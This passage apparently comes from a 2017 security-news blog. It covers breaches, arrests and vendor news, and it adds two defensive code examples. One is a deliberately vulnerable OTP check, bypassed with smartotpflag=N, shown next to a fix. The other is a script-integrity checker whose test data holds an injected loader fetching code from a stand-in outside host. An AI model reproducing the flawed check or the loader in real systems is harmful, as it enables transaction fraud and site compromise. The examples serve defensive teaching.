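Hypothetical example code, not SBI's: only the parameter name smartotpflag
and its Y/N values come from the report; the Session layout, function names
and the constructed requests are assumptions made for this illustration.
"""
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Session:
    """Server-side state for one logged-in user (assumed structure)."""
    user: str
    # OTP the server generated for the pending transaction and sent to the
    # registered mobile; None until one has been issued or after it is used.
    issued_otp: Optional[str] = None


def issue_otp(session: Session) -> str:
    """Generate a fresh 6-digit OTP and remember it server-side.

    Delivery to the registered mobile is out of scope here.
    """
    session.issued_otp = f"{secrets.randbelow(10**6):06d}"
    return session.issued_otp


def vulnerable_confirm(session: Session, form: dict) -> str:
    """The pattern the report describes: the client decides, via the flag it
    posts back, whether the OTP is checked at all."""
    if form.get("smartotpflag") == "Y":
        if form.get("otp") != session.issued_otp:
            return "rejected: bad OTP"
    # smartotpflag=N skips the OTP branch entirely, so the transfer completes
    # with no second factor.
    return f"completed: {form['amount']} to {form['beneficiary']}"


def hardened_confirm(session: Session, form: dict) -> str:
    """Fixed pattern: the server alone decides that this transaction requires
    an OTP, ignores any client-supplied flag, compares in constant time and
    consumes the code so it cannot be replayed."""
    if session.issued_otp is None:
        return "rejected: no OTP issued for this transaction"
    supplied = str(form.get("otp", ""))
    if not hmac.compare_digest(supplied.encode(), session.issued_otp.encode()):
        return "rejected: bad OTP"
    session.issued_otp = None  # one-time: a second submission fails
    return f"completed: {form['amount']} to {form['beneficiary']}"


def demo() -> dict:
    """Run both handlers against a constructed request that flips Y to N."""
    session = Session(user="demo-user")
    otp = issue_otp(session)
    tampered = {"amount": "50000", "beneficiary": "ACCT-PLACEHOLDER",
                "smartotpflag": "N", "otp": ""}   # constructed request
    honest = dict(tampered, smartotpflag="Y", otp=otp)
    return {
        "vulnerable_tampered": vulnerable_confirm(session, tampered),
        "hardened_tampered": hardened_confirm(session, tampered),
        "hardened_honest": hardened_confirm(session, honest),
        "hardened_replay": hardened_confirm(session, honest),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20s} {result}")
```

The point for defenders is that the requirement for a second factor must live in server-side state, never in a form field the browser sends back.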


Although the vulnerability was patched after Edwards' discovery, it was highly disappointing that the person who could easily have profited from it, but chose not to, was neither rewarded nor acknowledged for his work.

The press, too, failed to carry this important news, keeping the public in the dark and denying the discoverer any recognition.

Spies Hack Israeli Soldiers' Android Phones

More than 100 soldiers from the Israel Defense Forces (IDF) have become the target of a cyberespionage group when information from their mobile devices was stolen using malicious Android applications.

ViperRAT, the clandestine hacking campaign, was found actively hijacking soldiers’ Android-based smartphones to remotely siphon images and audio directly from the devices.

Highly sophisticated malware allowed the attackers to control each phone’s microphone and camera. In effect, the hackers could eavesdrop on soldiers’ conversations and peer into live camera footage — wherever an affected smartphone’s camera would be pointed, that vantage point could have also been viewable to the hackers.

A list of the apps installed on the infected mobile device is also sent out by the dropper. Depending on what is already installed on the device, some variants pretend to be chat apps and others pretend to be a YouTube player.

Other Android smartphone applications common among Israeli citizens and available in the Google Play store — including a billiards game, an Israeli Love Songs player, and a Move To iOS app — were found to contain hidden ViperRAT malware.

While the malicious actors behind ViperRAT have yet to be explicitly identified, their activity patterns suggest that the cyberespionage is being carried out by a group operating out of the Middle East.

Google looks to hire Australian hackers

Google is searching for Australia’s best and brightest hackers to fill hard-to-fill cyber security positions in the search giant’s own business. The tech giant's Australian hiring raid may well exacerbate the IT skills shortage in government agencies.

Google has taken this step because of the difficulty of finding the right mix of people for cyber security positions. Despite the various specialised courses offered by Australian universities, not many appear interested in taking them up. According to the Government's Cyber Security Strategy, the number of people taking up information and communications technology degrees has halved over the last decade.

Moreover, “it’s difficult to find such people who have the skills of hacking into a system but ultimately want to make it more secure and not use those skills negatively and are also willing to work in a big software company,” said Google Chrome’s security head, Parisa Tabriz.

Google feels the shortage as well, and is now looking to fill as many quality cyber security positions in Australia as it can.

But Google’s gain could be government’s loss. The federal government expects demand for cyber security services and related jobs — such as legal services, insurance and risk management — will grow by at least 21% over the next five years.

Government services, though, have been competing with private firms on salaries. It is a common problem for governments across the globe: when attempting to attract people for these jobs, they fall short of the salaries and perks that private firms offer prospective employees.

Two weeks ago, the giant US-based telco Verizon announced it has strengthened its armoury in the fight against cyber adversaries with its investment in next-generation security capabilities at its Asia-Pacific Advanced Security Operations Centre in Canberra.

The opening of the new security centre followed Verizon’s appointment last December to the federal government’s new whole of government telecommunications services panel which provides coordinated telecommunications services.

Thursday 16 February 2017

Hitachi Payment services accepts its systems were compromised

Hitachi Payment Services has completed an audit of the security breach that compromised about 3.2 million cards issued by Indian banks, disclosed in October 2016, after the Reserve Bank of India ordered the audit four months ago.

The company confirmed on Thursday that its systems were affected by "a sophisticated injection of malware (malicious software code)" that compromised the details of debit cards issued by banks.

Hitachi Payment Services, a firm that provides ATM, point-of-sale and other services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and found that the highly sophisticated malware worked undetected and concealed its tracks during the compromise period between May 21 and July 11, 2016.

“While the behavior of the malware and the penetration into the network has been deciphered, the amount of data exfiltrated during the above compromise period is unascertainable due to secure deletion by the malware,” said a statement released by Hitachi Payment Services.

The National Payments Corporation of India (NPCI), which oversees the payment system in India, found that almost 90 ATMs in the country were compromised by malware and that at least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services, said, “…we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers’ sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services.”

HACKING GANG AT LARGE FOR STEALTH

A hacker group in the Russian Federation, whose members were suspected of stealing funds from the accounts of Russian financial institutions, has been dismantled, the spokeswoman of the Ministry of Internal Affairs of the Russian Federation, Irina Wolf, stated.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Service of the Russian Federation, an unprecedented interdiction operation was carried out against the hacker group, whose members lived in 17 different locations of the country and had been involved in the misappropriation of funds from accounts of Russian financial institutions since 2013," Wolf stated in the report published on the website of the Ministry of Internal Affairs. "Over the period of its activity, 50 members managed to transfer more than 1 billion rubles."

The Spokesman of the Ministry of Internal Affairs added to her statement that other than bank accounts, attackers had also hacked critical infrastructure, including strategic industrial enterprises. 

Searches were conducted, during which computers, storage media and means of communication, as well as firearms and edged weapons, were seized.

"At the moment 27 organizers and participants of the group have been held criminally liable, and 19 of these suspects have been remanded in custody by court order," the statement on the website reads. The matter remains under investigation.

Friday 10 February 2017

Feds Bust Alleged Russian Bank Hacker in Los Angeles

A federal investigation into a Russian cybercrime ring led Secret Service agents to the doorstep of a 29-year-old Los Angeles man the United States calls an “extremely sophisticated and well-connected cybercriminal” who allegedly used malware to steal cash from thousands of U.S. bank accounts.
Alexander Tverdokhlebov was arrested in an early-morning raid Feb. 1 on a four-count wire-fraud indictment alleging that he worked with a Russian colleague in 2009 and 2010 to attack U.S. financial institutions. He allegedly used a botnet of 10,000 hacked PCs.
Tverdokhlebov is being held in the Metropolitan Detention Center in Los Angeles pending a bail review in Alexandria, Virginia, where he’s charged.
Long before the Kremlin was known for hacking political campaigns, Russian hackers and their peers in Ukraine dominated the for-profit cybercrime underworld, from the large-scale credit-card heists of the mid-2000s to today’s ransomware threat. And banking botnets have been a staple of Russian cybercrime for nearly a decade.
Instead of stealing passwords for a hacker to use later, the malware will wait for the victim to log in to their online banking, then splice itself into the connection and slip in a rogue funds transfer without setting off alarms at the bank. If the victim happens to check their balance or transaction history, the malware will even rewrite it on the fly to conceal the theft.
The Russian-made Zeus malware first proved the concept in 2009, and is behind, by some estimates, billions of dollars in losses over the years. Zeus’s alleged author, Evgeniy Bogachev, was even among the Russians sanctioned by President Obama last December in retaliation for the Kremlin’s election hacking, and the FBI has a $3 million reward out for his arrest.
The U.S. discovered Tverdokhlebov while examining the online chats of a different Russian: Vadim Polyakov, a 32-year-old St. Petersburg man who pleaded guilty last year to a million-dollar concert-ticket scam. Polyakov ran a crime ring that hacked consumers’ StubHub accounts to buy thousands of e-tickets for resale. He was arrested in Spain and extradited to the U.S. In July, a New York judge sentenced him to four to 12 years in state prison.
Court records don’t indicate how the Secret Service obtained Polyakov’s ICQ chat logs. The most likely scenario is that Spanish authorities seized Polyakov’s laptop at his arrest. In any event, the chat logs showed Polyakov conversing in Russian with a fellow cyberthief who let slip enough information to identify Tverdokhlebov as a suspect, specifically his first name, his girlfriend’s full name, and his home address and his phone number.
The indictment against Tverdokhlebov is based entirely on the years-old chats, with no hard information about specific thefts, suggesting that the feds are using it as a wedge to try and pry more evidence from Tverdokhlebov’s arrest and the search of his computers.
Over government objections, a magistrate judge set Tverdokhlebov’s bail at $100,000 last week but stayed the man’s release pending a government appeal, set to be heard in Virginia on Friday. The feds are urging that Tverdokhlebov be held without bail, claiming that he has few ties to the U.S. and enough underworld contacts to flee to Mexico and from there to Russia.
Tverdokhlebov was born in Russia and obtained U.S. citizenship in 2009 after marrying an American. According to prosecutors, the two have since divorced.
Secret Service agents have spent the days since Tverdokhlebov’s arrest opening his safe-deposit boxes. Three boxes in California were packed with $172,000 in $100 bills. A key locked in one box turned out to fit a fourth safe-deposit box in Las Vegas, where on Tuesday the feds found an additional $100,000.
“The large quantity of cash, as well as their distribution in safe-deposit boxes in different states, suggests that defendant may have concealed funds elsewhere in preparation for flight,” prosecutors wrote, urging that Tverdokhlebov be kept in jail.
Tverdokhlebov’s attorney, William Cummings, countered in a filing Thursday that his client is legitimately employed in Los Angeles and that the charges in the Virginia indictment are old.
Cummings also implied that with every cash-filled safe deposit box the feds find, his client becomes an even better candidate for pre-trial release. “The defendant, if he were on release, could now not go to Las Vegas to access that money,” he wrote.

nullcon Information Security Conference 8Bit, Goa 2017



nullcon was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero-day vulnerabilities and unknown threats. Our motto, "The neXt security thing!", drives the objective of the conference: to discuss and showcase the future of information security and the next generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why current technology is not sufficient and what the focus for the coming years in information security should be. In addition to security, one of the sections of the conference, called Desi Jugaad (Hindi for "Local Hack"), is dedicated to hacking in the broad sense: we invite researchers who come up with innovative security/tech/non-tech solutions for solving real-life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference. It is an integrated and structured platform, which caters to the needs of IT Security industry at large in a comprehensive way.

The event consists of 25 talks and 11 training sessions, which cover all major topics of the IT security industry. The conference is created for security companies and enthusiasts so they can showcase the most up-to-date research and technology on the topic, and the shared knowledge is usually put to use afterwards within the attendees' organizations. Moreover, we host an Exhibition, Free Workshops, CTF hacking competitions, a Job Fair, the BlackShield Awards and other events at the conference.

The keynote will be delivered by Joshua Pennell, Founder & President, IOActive, followed by talks from various international security researchers on topics such as ATM hacking, drone hijacking, telecom protocol security, blockchain issues, cloud security, bug hunting, social engineering, botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate 1000 attendees,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registration is still open! Get your pass here: http://nullcon.net/website/register-goa.php

Thursday 9 February 2017

Closing the Loop in Cyberspace

CyberBit, the cyber technology company established by Elbit Systems under the direction of Adi Dar, implements in cyberspace a proven military concept: prompt loop closure to contain cyber events. For some time now, the cyber technology industry has been discussing the need to operationalize the cybersecurity process. The idea here is that a company that accomplished that objective on the battlefield would be able to accomplish it in cyberspace, too.
"CyberBit implements a holistic cybersecurity concept, based on four primary elements: intelligence gathering, data analysis, command & control and an enforcement capability," explains Adi Dar, CyberBit's CEO. "Elbit Systems have been involved in cyber technology for more than 15 years. It began with the acquisition of Elron Telesoft in 2001 and the establishment of Elbit's ISTAR Division, and evolved in April 2015 into CyberBit. Back then, they did not call it cyber technology, but the foundations had been cast years ago.
"The establishment of CyberBit followed a management decision to offer Elbit Systems' cyber technology capabilities to the civilian market, too, and to leverage Elbit Systems' cyber technology assets for that end. In the civilian world, you must operate differently. You need unsupervised freedom of operation, you have to develop a brand, stay innovative and respond promptly. In the defense/security world, Elbit is a solid brand, but that does not help if you want to sell a cybersecurity solution to a bank, an insurance company or a retail chain.
"For this reason, CyberBit is made up of two sub-units – one sells products to the HLS world and the other to the civilian world. The company that sells to the civilian world is unsupervised and its employees do not have to undergo a security vetting process. It uses a separate IT network and is run like any other cyber technology company around the world."
"One of the moves we made was the acquisition, in July 2015, of the cyber technology division of the NICE Company," explains Dar. "This move had matured three months after the establishment of CyberBit. The idea was to acquire the assets of the NICE Company in the field of intelligence gathering, combine them with Elbit's knowledge management and C3 capabilities, and combine all of that with the assets of the 4C Company Elbit had acquired back in 2011."
One of the solutions CyberBit offers belongs in the EDR (Endpoint Detection & Response) category. It is a client installed in a core-level workstation/server, under the operating system. It "sees" and records a lot of the processes taking place in the computer. The data from all of the clients throughout the organization are collected by a Big Data system, and used to run algorithms that search for patterns indicating a cyberattack.
"Each workstation produces dozens of megabytes per day," explains Dar. "If the organization has 100,000 workstations, it will amount to a lot of data that should be managed and analyzed every day. Not many companies in this field can accomplish that on such a scale.
"The ability to analyze the data from all of the workstations in the network makes it possible to identify a pinpoint attack against a specific workstation, and mainly to identify attacks where the attacker moves laterally through the network. Pursuant to the identification stage, the client may be issued with an enforcement command to kill processes in that workstation. In this way, the threat is contained very quickly. The combination of a client at the core level and Big Data capabilities gives us an advantage in the market."
Along with collection of intelligence from the clients fitted to the organization's workstations and servers, CyberBit offers legitimate intelligence gathering solutions, which include Open Source Intelligence (OSInt) and intelligence gathering capabilities for stationary or mobile communication networks, including satellite communication networks. "Combining all of these activities enables us to provide a systemic intelligence gathering solution – from the organization and from the outside environment. This improves the organization's ability to identify cyberattacks," says Dar.
Another solution is a SOC (Security Operations Center) management system: a system for managing the organizational cybersecurity operations center, intended to provide transparency into the organization's networks. The SOC should effectively manage the response to cyberattacks.
"This product enables automation of the SOC procedures," explains Dar. "These centers are normally manned by people just starting out in the world of cyber technology. They come to work there for a short period of time, hone their professional skills and leave. Moreover, major organizations deploy multiple SOCs at various locations around the world, so as to avoid overtime pay. It is known as 'Follow the Sun'. When the sun sets over one country, it rises over another country, and the management of the SOC follows the sun.
"If you combine these two elements vis-à-vis the fact that a high-quality cyberattack against an organization can last months, you will realize that without automation of the SOC procedures, the organization will not be equipped to cope effectively with such an attack. At this point, Elbit's experience in the C3 world comes into the picture. In the end, you are talking about numerous sensors that produce logs, and you need an application with a rules engine to provide the analysts at the SOC with a scale of priorities."
Another field of activity in which CyberBit is involved is cybersecurity for SCADA (Supervisory Control and Data Acquisition) infrastructures. These are assets the 4C Company had brought into Elbit Systems. "In SCADA networks, we perform passive monitoring along with the ability to stop inline attacks," says Dar. "The OT system world is simpler than the IT world as it has a finite number of protocols. It is a more structured world. At the same time, since the Stuxnet worm was identified and the electrical infrastructure of the Ukraine was attacked in December 2015, there has been more understanding of the significance of the threat. This is the reason why many countries are developing regulation in the field of SCADA security."

Replacing Anti-Virus Software

According to Dar, one of the threats that currently challenges the industry is ransomware. "This is a threat that compels you to resort to real-time blocking, even before the encryption, but it is very difficult to catch before the encryption. If you catch it after the encryption, you will have no guarantee about being able to save the information – and that is a fairly complex challenge.
"Ransomware changed the demands of the clients, and now they want response – not just detection. It is nice if you managed to detect it, but what will the organization do with it? And in order to respond, you need a client on the computer. That leads to a war over the clients. I had a meeting with an information security manager of a bank, who told me that they have nine clients on the computer. The battle today is over the 'real estate' in the workstation or server. Ransomware can damage a large number of end stations, and even servers. We know how to contain the infected devices so as to prevent the threat from spreading. According to some of the estimates in the market, this technology will replace anti-virus software."
Unlike the defense industry, which has a well-defined and relatively 'niche type' target market, with civilian cybersecurity solutions the market is endless. Private clients, SMBs or major clients in every country around the world already need or will need cybersecurity solutions.
"There will be no escaping the transfer of cybersecurity solutions to the cloud," says Dar. "If I could place the EDR in the cloud, while at the same time installing it in all of the client's devices, I would have solved a major percentage of the client's problems. One must understand that smaller organizations do not have an information security team or an SOC. Cybersecurity for SMBs (Small to Medium Businesses) must be provided through their cloud information security service provider or MSSP (Managed Security Service Provider). I am referring to cybersecurity services for organizations with a personnel of 100-150 employees or less that cannot afford to finance more expensive solutions.
"CyberBit is not there yet, but we understand that this is the right direction. We can see a trend of transition to the cloud, although the truly sensitive information as well as the client of the EDR are not being transferred to the cloud yet. That will take time. Soon we will have to make a decision as to whether we want to remain a provider of technology exclusively, or provide cloud services as well.
"It is important to note that CyberBit does not compete against defense/security industries that offer cyber technology products, but against civilian cyber technology companies. For a defense/security industry it is inconceivable to provide cloud services to SMBs. For us it is a very realistic question. It is a part of our future. Elbit Systems established CyberBit in order to develop a civilian cyber technology industry, and the future of that industry is in the cloud and in mass-produced solutions, like anti-virus software. That's where the money is."

InterContinental Hotels Confirms Credit Card Breach


InterContinental Hotels Group (IHG), parent company to Crowne Plaza, Holiday Inn and Kimpton Hotels and Resorts, confirmed on Friday a breach of payment card systems used in 12 of its hotels located in North America and the Caribbean.
According to IHG, which operates 5,000 hotels worldwide, malware was found on servers used to process credit cards. The servers were infected between last August and December; the company declined to say how many payment cards were impacted.
In a statement released Friday, IHG said it found malware installed on servers used at popular destinations such as Michael Jordan’s Steak House and Bar in Chicago, the Holiday Inn San Francisco Fisherman’s Wharf, the Copper Lounge in Los Angeles, and the Palm Bar in Aruba. A full list of locations impacted was posted by IHG.
The hotelier reported on Dec. 28 that it was investigating customer complaints of unauthorized charges on credit cards. At the time, the company said only a limited number of destinations were impacted before revealing more details on Friday.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties,” according to a statement. “Cards used at the front desk of these properties were not affected.”
According to IHG, the malware searched for magnetic stripe track data as it was being routed through the servers. Track data included cardholder name, card number, expiration date and internal verification code. No information was provided on the strain of malware used in the attacks.
Hotels, restaurants and other hospitality outlets are frequently singled out as victims of opportunistic hackers. Last year alone there were nearly a dozen reports of card breaches. One of those breaches occurred in August and included 20 hotels run by HEI Hotels and Resorts, which owns chains Marriott, Sheraton, and Westin. Similarly, malware was used to siphon payment card data.
The prevalence of malware use to steal payment card data hit a peak in 2014 when it was at the center of several high-profile breaches, including Target and Neiman Marcus.
As recently as last November, security researchers at Trustwave said the Carbanak cybercrime gang, first discovered by Kaspersky Lab, had shifted strategy and began targeting the hospitality and restaurant industries with new techniques and malware. Part of the Carbanak tactics involved targeting hospitality call centers with elaborate ploys to get customer service representatives to accept and download emails with malicious macro-laced documents. The target was credit card data scraped from the memory of point-of-sale systems.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG wrote in a statement regarding the breach.

Smart TV Manufacturer Vizio Fined $2.2M for Tracking Customers

Smart TV manufacturer Vizio tracked viewing data on 11 million of its customers' TVs without their knowledge or consent, the Federal Trade Commission announced this week.
The Irvine, Calif.-based company agreed on Monday to pay $2.2 million to settle charges that it collected scores of its customers’ data. While the company tracked what programs users watched it also tracked information corresponding to customers’ sex, age, income, marital status, household size, education level, home ownership and household value.
According to a complaint filed by the agency in the U.S. District Court for the District of New Jersey on Monday, Vizio tracked users through proprietary automated content recognition (ACR) software made by a subsidiary, Inscape Services. While that software has been turned on by default since 2014 on most of Vizio’s televisions, the FTC alleges that in some instances the company remotely installed it on any previously sold televisions that didn’t have the software.
The software feeds Vizio a “second-by-second” transmission of what its consumers watch, regardless of whether it's on cable, on demand, a streaming device like Google’s Chromecast or Amazon’s Fire Stick, or even a DVD. According to the complaint, the software has quite a reach and is able to capture “up to 100 billion data points each day from more than 10 million VIZIO televisions.”
In addition to household demographics, the software also siphoned up technical details such as the home’s IP address, wired and wireless MAC addresses, how strong the home’s WiFi was, and even any nearby WiFi networks, the complaint (.PDF) reads.
The complaint alleges the company sold this information to third party companies who first used it to analyze the effectiveness of advertising, and then used it in targeted advertising.
“Defendants provide these third parties with IP addresses, so that the third parties can analyze a household’s behavior across devices, in order to determine, for example, (a) whether a consumer has visited a particular website following a television advertisement related to that website, or (b) whether a consumer has viewed a particular television program following exposure to an online advertisement for that program. The data is used in the aggregate to evaluate the effectiveness of advertising campaigns,” the complaint reads.
The company failed to provide users with any notice their viewing habits were being tracked. It wasn’t until March 2016 – in the midst of investigations against the company – that Vizio sent users a quick pop-up notification on their television notifying them their viewing data was being collected.
“This notification timed out after 30 seconds without input from the household member who happened to be viewing the screen at the time, and did not provide easy access to the settings menu,” the complaint reads.
Going forward, the company is required to disclose and obtain consent for any information it collects, to be transparent about what it is doing with its customers' information, and to develop a data privacy program subject to assessment every two years.
As part of the settlement Vizio is also being asked to erase any data it may have collected before March 1, 2016. Of the $2.2 million paid to settle the matter, $1.5 million will go to the FTC, another $1 million to the New Jersey Division of Consumer Affairs, with $300,000 of that amount suspended.
Vizio, for its part, issued a press release shortly after the settlement was announced on Monday saying it was "pleased to reach this resolution" and that it set a "new standard for best industry practices." At the same time, the company also took a moment to clarify exactly what kind of customer information its ACR program gathered.
According to Jerry Huang, Vizio’s General Counsel, the program didn’t pair viewing data with personally identifiable information; instead, as the complaint specifies, it was used “in the ‘aggregate’ to create summary reports.”
“VIZIO is pleased to reach this resolution with the FTC and the New Jersey Division of Consumer Affairs. Going forward, this resolution sets a new standard for best industry privacy practices for the collection and analysis of data collected from today’s internet-connected televisions and other home devices,” stated Jerry Huang, VIZIO General Counsel. “The ACR program never paired viewing data with personally identifiable information such as name or contact information, and the Commission did not allege or contend otherwise. Instead, as the Complaint notes, the practices challenged by the government related only to the use of viewing data in the ‘aggregate’ to create summary reports measuring viewing audiences or behaviors.”
“Today, the FTC has made clear that all smart TV makers should get people’s consent before collecting and sharing television viewing information and VIZIO now is leading the way,” concluded Huang.
In the FTC’s eyes, Vizio’s statement runs counter to a securities filing previously filed by the company. In the filing, Vizio claims its data analytics program “provides highly specific viewing behavior data on a massive scale with great accuracy, which can be used to generate intelligent insights for advertisers and media content providers.”
The FTC’s Acting Chairman Maureen K. Ohlhausen said Monday that Vizio’s practices, specifically how it failed to disclose the fact it was tracking users, were unfair and deceptive.
"Evidence shows that consumers do not expect televisions to collect and share information about what they watch. Consumers who are aware of such practices may choose a different television or change the television's settings to reflect their preferences," Ohlhausen wrote.
The FTC filed a complaint against another major technology company, D-Link, earlier this year. In that complaint, the agency alleged the router manufacturer failed to adequately secure its wireless routers and IP cameras, something that could have potentially put its customers’ data at risk of compromise.

Wednesday 8 February 2017

Polish banks hit by malware sent through hacked financial regulator


Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.
The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).
A spokesman for the KNF confirmed that its internal systems had been compromised by someone "from another country". When it was discovered that the regulator's servers were hosting malicious files that were then infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."
According to one cyber security site that spoke to a number of banks and carried out a preliminary analysis, several banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared among the roughly 20 commercial banks in the country, and other banks began reporting the same issues.
Ironically, it is the KNF that sets cybersecurity standards for Polish banks. It is thought that a modified JavaScript file on the regulator's own site caused visitors' browsers to load an external JavaScript file, which then pulled down the malicious payloads: a classic watering-hole attack in which a trusted site is used to reach its visitors.
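The attack chain described above (a tampered first-party script that pulls in a second script from an outside host) is the kind of change a site owner can catch by comparing what a page serves today against a known-good snapshot. The following is an added example, not code from the article or from anyone involved in the KNF incident; the page URL, host names and script bodies are constructed for illustration. It flags script tags that resolve to hosts outside an allow-list, script tags that are new relative to a baseline snapshot, and first-party script files whose content hash has changed.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def resolved_script_urls(html, page_url):
    """Absolute URLs of all external scripts referenced by the page.

    urljoin resolves relative, root-relative and protocol-relative
    ('//host/path') references the same way a browser would.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    return [urljoin(page_url, src) for src in collector.srcs]


def foreign_scripts(html, page_url, allowed_hosts):
    """Script URLs whose host is neither the page's own host nor allow-listed."""
    allowed = {h.lower() for h in allowed_hosts}
    page_host = urlparse(page_url).hostname
    if page_host:
        allowed.add(page_host.lower())
    flagged = []
    for url in resolved_script_urls(html, page_url):
        host = urlparse(url).hostname
        if host is None or host.lower() not in allowed:
            flagged.append(url)
    return flagged


def new_script_urls(baseline_html, current_html, page_url):
    """Script URLs present in the current page but absent from the baseline snapshot."""
    before = set(resolved_script_urls(baseline_html, page_url))
    after = set(resolved_script_urls(current_html, page_url))
    return sorted(after - before)


def changed_files(baseline_files, current_files):
    """URLs whose script body differs from (or is missing in) the baseline.

    Both arguments map URL -> raw bytes of the fetched script. Hashing catches
    the case the article describes: an existing first-party file modified to
    append a loader, with no new <script> tag in the HTML at all.
    """
    changed = []
    for url, body in sorted(current_files.items()):
        previous = baseline_files.get(url)
        if previous is None or hashlib.sha256(previous).digest() != hashlib.sha256(body).digest():
            changed.append(url)
    return changed


# Constructed sample data (hypothetical hosts, not indicators from the KNF incident).
PAGE_URL = "https://www.regulator.example/index.html"
ALLOWED_HOSTS = ["www.regulator.example", "static.regulator.example"]

BASELINE_HTML = """<html><head>
<script src="/js/jquery.min.js"></script>
<script src="//static.regulator.example/js/site.js"></script>
</head><body>...</body></html>"""

# Same page after tampering: one added tag pulling a script from an outside host.
TAMPERED_HTML = """<html><head>
<script src="/js/jquery.min.js"></script>
<script src="//static.regulator.example/js/site.js"></script>
<script src="https://cdn-analytics.example.net/stat.js"></script>
</head><body>...</body></html>"""

# First-party script bodies: site.js has had a second-stage loader appended.
BASELINE_FILES = {
    "https://www.regulator.example/js/jquery.min.js": b"/* jquery */",
    "https://static.regulator.example/js/site.js": b"initSite();",
}
CURRENT_FILES = {
    "https://www.regulator.example/js/jquery.min.js": b"/* jquery */",
    "https://static.regulator.example/js/site.js":
        b"initSite();var s=document.createElement('script');"
        b"s.src='https://cdn-analytics.example.net/stat.js';document.head.appendChild(s);",
}

if __name__ == "__main__":
    print("foreign hosts:", foreign_scripts(TAMPERED_HTML, PAGE_URL, ALLOWED_HOSTS))
    print("new tags:     ", new_script_urls(BASELINE_HTML, TAMPERED_HTML, PAGE_URL))
    print("changed files:", changed_files(BASELINE_FILES, CURRENT_FILES))
```

The HTML-level checks only see tags present in the served page; a modified script body that injects its loader at runtime, as in the constructed site.js above, is caught only by the content-hash comparison, so a monitoring job should fetch and hash the first-party scripts as well as the page itself.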
Both the KNF and the Polish government have since told local Polish media that there is no indication that people's money was touched and have given tentative assurances that no operations were affected. But they also stressed that investigations were ongoing.
The situation is being seen as the most serious attack ever on the Polish banking industry.

Sophos to assimilate Invincea's intelligent machine tech to fight malware

Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.
Invincea makes a line of signature-less endpoint protection technologies that rely on machine learning and behavioural monitoring to block malware.
Sophos plans to integrate Invincea's tech into the Sophos Central endpoint product line before releasing revamped products later this year. The plan parallels the integration of SurfRight's technology into Sophos's product line following a smaller December 2015 acquisition.
In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.
Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.
Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be "broadly neutral" to its balance sheet in its first year before adding to its revenues thereafter.
Sophos CEO Kris Hagerman commented: "Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos's leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity."

Cyberbit to Launch Cybersecurity Training Facility in Japan

Together with Ni Cybersecurity, Elbit Systems' subsidiary will launch a cybersecurity training and simulation center in Tokyo, addressing the growing cybersecurity skill shortage before the 2020 Olympics
Elbit Systems announced today that its subsidiary Cyberbit was awarded a contract from Ni Cybersecurity, the Japanese cybersecurity service provider, to launch a cybersecurity training and simulation center in Tokyo powered by the Cyberbit Range platform.
Ni Cybersecurity will set up a training facility in Toranomon, Tokyo that will address the skills shortage by accelerating the certification of new cybersecurity experts and helping organizations improve the skills of their existing staff, focusing on government and finance organizations. The contract, in an amount that is not material to Elbit Systems, will be performed during 2017.
The new training facility will be powered by the Cyberbit Range, a cybersecurity training and simulation platform. It enables trainees to practice in real-life settings by accurately replicating their network setup, using their actual security tools and simulating their typical network traffic. The Range provides a selection of simulated attack scenarios, including ransomware. It is the underlying platform for multiple training centers in North America, Asia and Europe.
Adi Dar, Cyberbit’s CEO said, “When there is a need to certify tens of thousands of new cybersecurity experts while improving the skills of existing ones, all within a very short timeframe, enrollment in simulated training programs is the best choice for finance, government and other organizations in Japan. I am confident that the initiative, led by Ni Cybersecurity, powered by our Range platform, will contribute to Japan’s cyber readiness for the 2020 Olympic Games, and for years to follow."
